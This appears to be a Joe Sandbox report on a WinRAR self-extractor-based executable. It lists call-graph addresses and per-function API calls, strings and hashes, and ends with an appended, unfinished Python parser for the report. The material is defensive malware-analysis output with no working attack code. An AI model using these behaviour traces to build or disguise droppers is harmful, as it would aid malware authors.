23164->23165 23167 157bb5 23164->23167 23166 160e21 79 API calls 23165->23166 23166->23167 23169 158215 __EH_prolog 23168->23169 23197 15137e 23169->23197 23171 158230 23205 159ba2 23171->23205 23177 15825f 23325 15162e 23177->23325 23178 1582fa 23224 1583a3 23178->23224 23182 15835a 23228 151e8e 23182->23228 23185 15825b 23185->23177 23185->23178 23188 15a145 8 API calls 23185->23188 23329 15b6cb CompareStringW 23185->23329 23186 158365 23186->23177 23232 153a20 23186->23232 23242 158409 23186->23242 23188->23185 23191 15a15a 23190->23191 23195 15a15e 23191->23195 23669 15a273 23191->23669 23193 15a16e 23194 15a173 FindClose 23193->23194 23193->23195 23194->23195 23195->23156 23196->23158 23198 151383 __EH_prolog 23197->23198 23331 15c413 23198->23331 23200 1513ba 23204 151413 ___scrt_get_show_window_mode 23200->23204 23337 16cdae 23200->23337 23204->23171 23206 159bad 23205->23206 23207 158246 23206->23207 23362 156e66 67 API calls 23206->23362 23207->23177 23209 1519b1 23207->23209 23210 1519bb __EH_prolog 23209->23210 23217 1519fd 23210->23217 23223 1519e4 23210->23223 23363 15135c 23210->23363 23212 151b16 23366 156d0d 67 API calls 23212->23366 23214 153a20 90 API calls 23219 151b6d 23214->23219 23215 151b26 23215->23214 23215->23223 23216 151bb7 23222 151bea 23216->23222 23216->23223 23367 156d0d 67 API calls 23216->23367 23217->23212 23217->23215 23217->23223 23219->23216 23220 153a20 90 API calls 23219->23220 23220->23219 23221 153a20 90 API calls 23221->23222 23222->23221 23222->23223 23223->23185 23225 1583b0 23224->23225 23385 15ffb8 GetSystemTime SystemTimeToFileTime 23225->23385 23227 158314 23227->23182 23330 1606c8 65 API calls 23227->23330 23230 151e93 __EH_prolog 23228->23230 23229 151ec7 23229->23186 23230->23229 23387 1518f6 23230->23387 23233 153a30 23232->23233 23234 153a2c 23232->23234 23235 153a5d 23233->23235 23236 153a4f 23233->23236 23234->23186 23605 15276c 90 API calls 3 library calls 23235->23605 23239 153a8f 23236->23239 23604 153203 
78 API calls 3 library calls 23236->23604 23239->23186 23240 153a5b 23240->23239 23606 151fd2 67 API calls 23240->23606 23243 158413 __EH_prolog 23242->23243 23244 15844f 23243->23244 23274 158453 23243->23274 23635 1677e7 93 API calls 23243->23635 23245 158478 23244->23245 23250 1584ff 23244->23250 23244->23274 23247 15849a 23245->23247 23245->23274 23636 157a2f 151 API calls 23245->23636 23247->23274 23637 1677e7 93 API calls 23247->23637 23250->23274 23607 155d98 23250->23607 23252 15858c 23252->23274 23615 1580f8 23252->23615 23255 1586e9 23256 15a145 8 API calls 23255->23256 23257 15874d 23255->23257 23256->23257 23619 157c11 23257->23619 23259 15c57d 73 API calls 23262 1587a7 _memcmp 23259->23262 23260 1588d1 23261 1589a0 23260->23261 23268 15891f 23260->23268 23266 1589fb 23261->23266 23278 1589ab 23261->23278 23262->23259 23262->23260 23263 1588ca 23262->23263 23262->23274 23638 1580a6 75 API calls 23262->23638 23639 156d0d 67 API calls 23262->23639 23640 156d0d 67 API calls 23263->23640 23276 15898f 23266->23276 23643 157f88 89 API calls 23266->23643 23267 1589f9 23269 159437 72 API calls 23267->23269 23270 159dff 4 API calls 23268->23270 23268->23276 23269->23274 23275 158956 23270->23275 23271 159437 72 API calls 23271->23274 23273 158a64 23277 15971a GetFileType 23273->23277 23289 158acd 23273->23289 23321 158fb5 23273->23321 23274->23186 23275->23276 23641 159161 89 API calls 23275->23641 23276->23267 23276->23273 23280 158aa5 23277->23280 23278->23267 23642 157dc4 93 API calls ___InternalCxxFrameHandler 23278->23642 23279 15a6a9 8 API calls 23282 158b1c 23279->23282 23280->23289 23644 151f18 67 API calls 23280->23644 23284 15a6a9 8 API calls 23282->23284 23288 158b32 23284->23288 23286 158abb 23645 156f67 68 API calls 23286->23645 23290 158bd5 23288->23290 23625 159869 23288->23625 23289->23279 23291 158d22 23290->23291 23292 158c1e 23290->23292 23297 158d34 23291->23297 23298 158d48 23291->23298 23314 158c4e 23291->23314 23293 158c8e 23292->23293 
23296 158c2e 23292->23296 23295 1580f8 CharUpperW 23293->23295 23300 158ca9 23295->23300 23301 158c72 23296->23301 23306 158c3c 23296->23306 23302 1590d0 120 API calls 23297->23302 23299 161fa9 68 API calls 23298->23299 23303 158d61 23299->23303 23307 158cd2 23300->23307 23308 158cd9 23300->23308 23300->23314 23301->23314 23647 1577d4 101 API calls 23301->23647 23302->23314 23304 161c40 120 API calls 23303->23304 23304->23314 23646 151f18 67 API calls 23306->23646 23648 157586 77 API calls ___InternalCxxFrameHandler 23307->23648 23649 15900e 85 API calls __EH_prolog 23308->23649 23312 158e6c 23313 158edb 23312->23313 23312->23321 23651 159b6a SetEndOfFile 23312->23651 23630 159a12 23313->23630 23314->23312 23650 151f18 67 API calls 23314->23650 23318 158f35 23319 1594a3 68 API calls 23318->23319 23320 158f40 23319->23320 23320->23321 23322 15a0c3 4 API calls 23320->23322 23321->23271 23323 158f9f 23322->23323 23323->23321 23652 151f18 67 API calls 23323->23652 23326 151640 23325->23326 23668 15c4b6 79 API calls 23326->23668 23329->23185 23330->23182 23332 15c41d __EH_prolog 23331->23332 23333 16cdae new 8 API calls 23332->23333 23334 15c460 23333->23334 23335 16cdae new 8 API calls 23334->23335 23336 15c484 23335->23336 23336->23200 23338 16cdb3 new 23337->23338 23339 151400 23338->23339 23349 1746ca 7 API calls 2 library calls 23338->23349 23350 16d83a RaiseException CallUnexpected new 23338->23350 23351 16d81d RaiseException Concurrency::cancel_current_task CallUnexpected 23338->23351 23339->23204 23343 15ac66 23339->23343 23344 15ac70 __EH_prolog 23343->23344 23352 15ddc2 73 API calls 23344->23352 23346 15ac82 23353 15ad7e 23346->23353 23349->23338 23352->23346 23354 15ad90 ___scrt_get_show_window_mode 23353->23354 23357 15fce6 23354->23357 23360 15fca6 GetCurrentProcess GetProcessAffinityMask 23357->23360 23361 15acf8 23360->23361 23361->23204 23362->23207 23368 151705 23363->23368 23365 151378 23365->23217 23366->23223 23367->23222 23369 15171b 23368->23369 
23380 151773 __vswprintf_c_l 23368->23380 23370 151744 23369->23370 23381 156dd3 67 API calls __vswprintf_c_l 23369->23381 23372 151760 new 23370->23372 23373 15179a 23370->23373 23372->23380 23383 156e0b 68 API calls 23372->23383 23375 1720de 22 API calls 23373->23375 23374 15173a 23382 156e0b 68 API calls 23374->23382 23377 1517a1 23375->23377 23377->23380 23384 156e0b 68 API calls 23377->23384 23380->23365 23381->23374 23382->23370 23383->23380 23384->23380 23386 15ffe8 __vswprintf_c_l 23385->23386 23386->23227 23388 1518fb __EH_prolog 23387->23388 23389 151934 23388->23389 23391 151964 23388->23391 23394 15190f 23388->23394 23390 153a20 90 API calls 23389->23390 23390->23394 23396 153e69 23391->23396 23394->23229 23400 153e72 23396->23400 23397 153a20 90 API calls 23397->23400 23398 151980 23398->23394 23401 151da1 23398->23401 23400->23397 23400->23398 23413 15f8f2 23400->23413 23402 151dab __EH_prolog 23401->23402 23421 153aa3 23402->23421 23404 151dd4 23405 151705 69 API calls 23404->23405 23407 151e5b 23404->23407 23406 151deb 23405->23406 23451 15187c 69 API calls 23406->23451 23407->23394 23409 151e03 23411 151e0f 23409->23411 23452 1606e9 MultiByteToWideChar 23409->23452 23453 15187c 69 API calls 23411->23453 23414 15f8f9 23413->23414 23415 15f914 23414->23415 23419 156dce RaiseException CallUnexpected 23414->23419 23417 15f925 SetThreadExecutionState 23415->23417 23420 156dce RaiseException CallUnexpected 23415->23420 23417->23400 23419->23415 23420->23417 23422 153aad __EH_prolog 23421->23422 23423 153ac3 23422->23423 23424 153adf 23422->23424 23490 156d0d 67 API calls 23423->23490 23426 153d1f 23424->23426 23429 153b0b 23424->23429 23509 156d0d 67 API calls 23426->23509 23427 153ace 23427->23404 23429->23427 23454 160be0 23429->23454 23431 153b43 23458 161fa9 23431->23458 23433 153b8c 23434 153c17 23433->23434 23450 153b83 23433->23450 23493 15c57d 23433->23493 23471 15a6a9 23434->23471 23435 153b88 23435->23433 23492 151fb8 69 API calls 23435->23492 
[Function call graph: node and edge list of function addresses and called API names (e.g. EnterCriticalSection, FindFirstFileW, ShellExecuteExW, LoadLibraryExW), rendered as a graph figure in the original report; not reproduced as text here.]

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0015F353: GetModuleHandleW.KERNEL32 ref: 0015F36B
                                                                                      • Part of subcall function 0015F353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0015F383
                                                                                      • Part of subcall function 0015F353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0015F3A6
                                                                                      • Part of subcall function 00168B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00168B96
                                                                                      • Part of subcall function 00169036: OleInitialize.OLE32(00000000), ref: 0016904F
                                                                                      • Part of subcall function 00169036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00169086
                                                                                      • Part of subcall function 00169036: SHGetMalloc.SHELL32(001920E8), ref: 00169090
                                                                                      • Part of subcall function 00160722: GetCPInfo.KERNEL32(00000000,?), ref: 00160733
                                                                                      • Part of subcall function 00160722: IsDBCSLeadByte.KERNEL32(00000000), ref: 00160747
                                                                                    • GetCommandLineW.KERNEL32 ref: 0016C179
                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0016C1A0
                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0016C1B1
                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0016C1EB
                                                                                      • Part of subcall function 0016BE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0016BE20
                                                                                      • Part of subcall function 0016BE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0016BE5C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0016C1F4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,001A7938,00000800), ref: 0016C20F
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,001A7938), ref: 0016C221
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0016C228
                                                                                    • _swprintf.LIBCMT ref: 0016C267
                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0016C279
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0016C27C
                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0016C293
                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00019B4F,00000000), ref: 0016C2E4
                                                                                    • Sleep.KERNEL32(?), ref: 0016C312
                                                                                    • DeleteObject.GDI32 ref: 0016C351
                                                                                    • DeleteObject.GDI32(?), ref: 0016C35D
                                                                                      • Part of subcall function 0016A8D4: CharUpperW.USER32(?,?,?,?,00001000), ref: 0016A92C
                                                                                      • Part of subcall function 0016A8D4: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 0016A953
                                                                                    • CloseHandle.KERNEL32 ref: 0016C39C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                    • API String ID: 985665271-3710569615
                                                                                    • Opcode ID: 86a4fd95714ece7f38b723dad9b85c344a9ec8848586ef9606df78afe84bb1ee
                                                                                    • Instruction ID: b04e426cbec113583e4275872f033bbc4c25264001ae42a6dbdb6d3984221b18
                                                                                    • Opcode Fuzzy Hash: 86a4fd95714ece7f38b723dad9b85c344a9ec8848586ef9606df78afe84bb1ee
                                                                                    • Instruction Fuzzy Hash: AB61EA72904304AFD311AB65EC49E3737ECBB59754F04042AF981936A2DB749E94CBB2

                                                                                    Control-flow Graph

                                                                                    [Control-flow graph for the function starting at 168bd0 (basic blocks 168bd0-168cc8 and their edges, colored executed / not executed in the original figure); rendered as a graph figure in the original report, not reproduced as text here.]
                                                                                    APIs
                                                                                    • FindResourceW.KERNELBASE(00000066,PNG,?,?,00169AC8,00000066), ref: 00168BE1
                                                                                    • SizeofResource.KERNEL32(00000000,75295780,?,?,00169AC8,00000066), ref: 00168BF9
                                                                                    • LoadResource.KERNEL32(00000000,?,?,00169AC8,00000066), ref: 00168C0C
                                                                                    • LockResource.KERNEL32(00000000,?,?,00169AC8,00000066), ref: 00168C17
                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,00169AC8,00000066), ref: 00168C35
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00168C42
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00168C62
                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00168C9D
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00168CB2
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00168CB9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                                    • String ID: PNG
                                                                                    • API String ID: 3656887471-364855578
                                                                                    • Opcode ID: 228e201f6ed3fe1aa03b21c7919ad516329c9f7613a7a42839c093d5506db740
                                                                                    • Instruction ID: cd75e6b998f0f98e574f64709d9969da708d5db39a1e81a99fbda2ae7a3a84d5
                                                                                    • Opcode Fuzzy Hash: 228e201f6ed3fe1aa03b21c7919ad516329c9f7613a7a42839c093d5506db740
                                                                                    • Instruction Fuzzy Hash: E2219E71602706AFC7229F61DC4DDABBBA8EF897A1B004628F845C2660DB31CD54DBB0

                                                                                    Control-flow Graph

                                                                                    [Control-flow graph for the function starting at 15a273 (basic blocks 15a273-15a3f5 and their edges, colored executed / not executed in the original figure); rendered as a graph figure in the original report, not reproduced as text here.]
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A2A8
                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A2DE
                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A2E6
                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A30E
                                                                                    • GetLastError.KERNEL32(?,?,?,?,0015A16E,000000FF,?,?), ref: 0015A31A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$ErrorFirstLast$Next
                                                                                    • String ID:
                                                                                    • API String ID: 869497890-0
                                                                                    • Opcode ID: c22509e67bd5c7f2dad3bf80c733cdeb450f110ee7a3e7c4790abaa43f390834
                                                                                    • Instruction ID: 44cdeb6cee6d927c21089ba266501a8a3eb198eefeb09789fb1b71739014fec9
                                                                                    • Opcode Fuzzy Hash: c22509e67bd5c7f2dad3bf80c733cdeb450f110ee7a3e7c4790abaa43f390834
                                                                                    • Instruction Fuzzy Hash: 4341A272608245EFC365DF64C880ADEF7E8BF49345F500A2AF9E9D3200D734A9588B92
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,00174A30,?,00187F68,0000000C,00174B87,?,00000002,00000000), ref: 00174A7B
                                                                                    • TerminateProcess.KERNEL32(00000000,?,00174A30,?,00187F68,0000000C,00174B87,?,00000002,00000000), ref: 00174A82
                                                                                    • ExitProcess.KERNEL32 ref: 00174A94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 347e6466763bfbf1b9ea371b58a463ea9e5852615036197b6a790a04fd907f17
                                                                                    • Instruction ID: 34a11f20017a7b7bd6b8885fb94d392e63ba2612a6b43e683174fc3a4c5d47fa
                                                                                    • Opcode Fuzzy Hash: 347e6466763bfbf1b9ea371b58a463ea9e5852615036197b6a790a04fd907f17
                                                                                    • Instruction Fuzzy Hash: 9AE0B631080508AFCF52AF64DD09A893B7DEF54391F018414F84A9B521CB35DE96DB84
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 0015840E
                                                                                    • _memcmp.LIBVCRUNTIME ref: 00158870
                                                                                      • Part of subcall function 001580F8: CharUpperW.USER32(?,?,00000000,?,?,?,?,?,?,?,00000800,?,001586E9,?,-00000930,?), ref: 001581BB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharH_prologUpper_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 4047935103-0
                                                                                    • Opcode ID: 6754fcf81dc10a152f866018712d9c4d1cbb6d1f8bd86e62a3df06fab4392334
                                                                                    • Instruction ID: f54e3f1c93d6377450f3893bb3e2f26cd4c1359ed6b377e1ddeb0b59609989be
                                                                                    • Opcode Fuzzy Hash: 6754fcf81dc10a152f866018712d9c4d1cbb6d1f8bd86e62a3df06fab4392334
                                                                                    • Instruction Fuzzy Hash: F5720B70504185EEDF25DF64C885BF9B7B9AF15301F0841BAED69AF182DB309A8DCB60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 0d2b4e1a891bfc3382bc205793351769c97b0153b2423ac544beb661bc532afe
                                                                                    • Instruction ID: 8834dfc7f9a3e1c8abfab6a5b61bc3fea33a32757bc7f3776f66b686da784dc9
                                                                                    • Opcode Fuzzy Hash: 0d2b4e1a891bfc3382bc205793351769c97b0153b2423ac544beb661bc532afe
                                                                                    • Instruction Fuzzy Hash: ACD128B1A087459FCB14CF28CC8479BBBE2BF95308F08056DEC449B642D734E969CB96
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00169B54
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prologItemTextWindow
                                                                                    • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                    • API String ID: 810644672-2803697902
                                                                                    • Opcode ID: 43ffe0614216c3054a385c5f2b7fa46ceab1c5bc8561163dbfe654a51140c342
                                                                                    • Instruction ID: cf565613259330d00b8c6e572852b188662703d42192cdd0409a463fb1f06435
                                                                                    • Opcode Fuzzy Hash: 43ffe0614216c3054a385c5f2b7fa46ceab1c5bc8561163dbfe654a51140c342
                                                                                    • Instruction Fuzzy Hash: A042F471A40344BFEB21AB609D89FEE3BACAF16701F440056FA51B64D1D7744EE8CB62

                                                                                    Control-flow Graph
                                                                                    • Basic blocks 15f353-15f8ef; the rendered graph (with its executed / not-executed colouring) is not preserved in this extraction.
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32 ref: 0015F36B
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0015F383
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0015F3A6
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0015F651
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0015F669
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0015F67B
                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00180858,00000000), ref: 0015F69A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0015F6F2
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0015F708
                                                                                    • CompareStringW.KERNEL32(00000400,00001001,001808A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0015F762
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00180870,00000800,?,00000000,?,00000800), ref: 0015F78B
                                                                                    • GetFileAttributesW.KERNEL32(?,?,00180930,00000800), ref: 0015F7C4
                                                                                      • Part of subcall function 0015F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0015F324
                                                                                      • Part of subcall function 0015F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0015DEC8,Crypt32.dll,?,0015DF4A,?,0015DF2E,?,?,?,?), ref: 0015F346
                                                                                    • _swprintf.LIBCMT ref: 0015F834
                                                                                    • _swprintf.LIBCMT ref: 0015F880
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • AllocConsole.KERNEL32 ref: 0015F888
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0015F892
                                                                                    • AttachConsole.KERNEL32(00000000), ref: 0015F899
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0015F8BF
                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 0015F8C6
                                                                                    • Sleep.KERNEL32(00002710), ref: 0015F8D1
                                                                                    • FreeConsole.KERNEL32 ref: 0015F8D7
                                                                                    • ExitProcess.KERNEL32 ref: 0015F8DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                    • API String ID: 1201351596-3298887752
                                                                                    • Opcode ID: efbce85062be4db53e11aeeff0479f80c06138c7f75705ee9c6572b7d8e7836c
                                                                                    • Instruction ID: 06eef43f4c8085a08d4639033ea8ab754bcd86d406d7d639662d80398a373e4a
                                                                                    • Opcode Fuzzy Hash: efbce85062be4db53e11aeeff0479f80c06138c7f75705ee9c6572b7d8e7836c
                                                                                    • Instruction Fuzzy Hash: 70D160B1408388DAD7B2EF50C949B9FB7E8AF89345F50092DF598AA140C7B0974DCF52
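The entry above is a start-up routine that resolves SetDllDirectoryW and SetDefaultDllDirectories by name, compares and stats DLL file names beside the executable (DXGIDebug.dll, dwmapi.dll, uxtheme.dll), loads Crypt32.dll from the system directory in a helper, and exits after writing the "Please remove %s from %s folder" warning to a console. Pulling those facts out of the report by hand is slow; the parser below turns the "APIs" and "String ID" lines of a Joe Sandbox function entry into records and answers the triage questions that matter for a routine like this (what is imported directly, what is resolved at run time, which DLL names it handles). This is an added example, not code from Joe Sandbox or from the analysed sample; SAMPLE is copied from the entry above, while the record layout and the helper names (ApiCall, FunctionEntry, parse_entry) are this example's own choices.

```python
"""Parse the per-function 'APIs' and 'String ID' lines of a Joe Sandbox
function entry into structured records for triage.

Added example, not part of the Joe Sandbox report or of the analysed sample.
SAMPLE is copied from the report's entry for the function at 0015F353; the
record layout and the helper names are this example's own choice.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# "• Name.MODULE(arg,arg), ref: ADDR", optionally prefixed with
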